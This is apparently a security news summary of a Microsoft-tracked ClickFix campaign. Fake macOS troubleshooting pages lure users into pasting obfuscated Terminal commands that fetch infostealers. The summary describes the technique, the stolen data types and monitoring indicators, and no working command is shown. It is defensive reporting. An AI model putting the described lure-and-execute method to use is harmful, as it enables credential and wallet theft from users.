ClickFix macOS Campaign Delivers Infostealers

Introduction

Microsoft is tracking an evolving ClickFix campaign that now targets macOS users through fake troubleshooting content and bogus utility installation instructions. This matters because the attack shifts away from traditional app downloads and instead abuses Terminal commands, helping attackers avoid some of the protections users expect from standard macOS application installs.

What’s new

Microsoft says threat actors are posting fake macOS advice on standalone websites, Medium, Craft, and similar user-driven platforms. The lures often claim to help with common issues such as freeing disk space or fixing system problems.

Key changes in this campaign include:

• Users are instructed to paste Base64-encoded or obfuscated commands into Terminal
• The commands retrieve remote content and launch script-based loaders
• Attackers use native tools like curl, osascript, and shell interpreters
• This method avoids the normal Gatekeeper-style checks applied to app bundles opened in Finder
• Payloads observed include Macsync, SHub Stealer, and AMOS

Microsoft also identified three execution paths:

• Loader install campaign
• Script install campaign
• Helper install campaign

Across these variants, the objective is consistent: collect credentials and sensitive files, establish persistence, and exfiltrate data.

Why it matters for IT admins

The malware goes beyond simple credential theft. According to Microsoft, these infostealers can collect:

• Keychain entries
• iCloud account data
• Browser credentials
• Telegram data
• Media and documents
• Cryptocurrency wallet data

Some variants also replace legitimate crypto wallet apps with trojanized versions, increasing the risk of financial theft.

For security teams, the bigger concern is user-driven execution. Because the victim manually runs commands in Terminal, attackers reduce dependence on malicious app packages and increase the chance of successful compromise.

Recommended actions

Administrators and security teams should take the following steps:

• Educate users not to paste commands into Terminal from blogs, forums, or troubleshooting pages
• Monitor for suspicious use of curl, osascript, shell interpreters, and unexpected LaunchAgent or LaunchDaemon creation
• Investigate staging paths such as /tmp/shub_<random ID> and unusual archive creation in /tmp
• Review detections for data exfiltration, credential prompts, and persistence tied to fake update services
• Prioritize protection for crypto-related apps and sensitive user data stores like Keychain

Bottom line

This ClickFix macOS campaign shows how social engineering is adapting to bypass traditional app-based defenses. For defenders, user awareness, endpoint monitoring, and detection of suspicious script execution are now critical to stopping these infostealer chains before data is stolen.